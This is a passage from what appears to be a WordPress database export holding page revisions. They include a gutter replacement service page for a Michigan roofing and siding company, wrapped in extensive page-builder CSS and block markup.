@media only screen and (min-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-83cb1aa8-0231-4055-b4ea-269bc3094807 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"48ae0073-510e-4c83-8809-35ac2817fe1c\"} -->\n<style type=\"text/css\"> .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-48ae0073-510e-4c83-8809-35ac2817fe1c\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"8267b3f3-870f-4554-a914-4ecf959b186f\"} -->\n<style type=\"text/css\"> .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8267b3f3-870f-4554-a914-4ecf959b186f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8c9e0ac6-d876-416a-b243-cf53e086ab36\"} -->\n<style type=\"text/css\"> .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8c9e0ac6-d876-416a-b243-cf53e086ab36 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"d204557b-2856-4858-9f1e-44166c4c7311\"} -->\n<style type=\"text/css\"> .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d204557b-2856-4858-9f1e-44166c4c7311\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"a832934f-ab08-4930-a2bd-ee3f588a4e9d\"} -->\n<style type=\"text/css\"> .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>You’re one step away from connecting with a specialist who can complete your Gutter Replacement project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Submit one easy form.</li><li>Connect with a local specialist.</li><li>Get a quick quote.</li><li>Enjoy your completed home project.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Dunrite Roofing And Siding Based in Northern Oakland County We have served Northern Oakland County and the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-revision-v1','','','2022-08-23 19:09:38','2022-08-23 19:09:38','',229,'https://cteisys.com/?p=463',0,'revision','',0),(464,1,'2022-08-24 17:03:31','2022-08-24 17:03:31','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"60b023b9-e8c3-43e6-89ba-c3dfbd99479c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a687cc3b-6428-4919-81c1-fb1cd829e749\"} -->\n<style type=\"text/css\"> .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a687cc3b-6428-4919-81c1-fb1cd829e749 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"8e161f0c-c998-4842-8873-8f192f3cb764\"} -->\n<style type=\"text/css\"> .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e161f0c-c998-4842-8873-8f192f3cb764\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"6a2bf94f-4d60-433a-b525-d53bf9619216\"} -->\n<style type=\"text/css\"> .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a2bf94f-4d60-433a-b525-d53bf9619216\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"1a6b31cd-8a87-4edc-99f2-33dd2b097132\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-1a6b31cd-8a87-4edc-99f2-33dd2b097132 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style 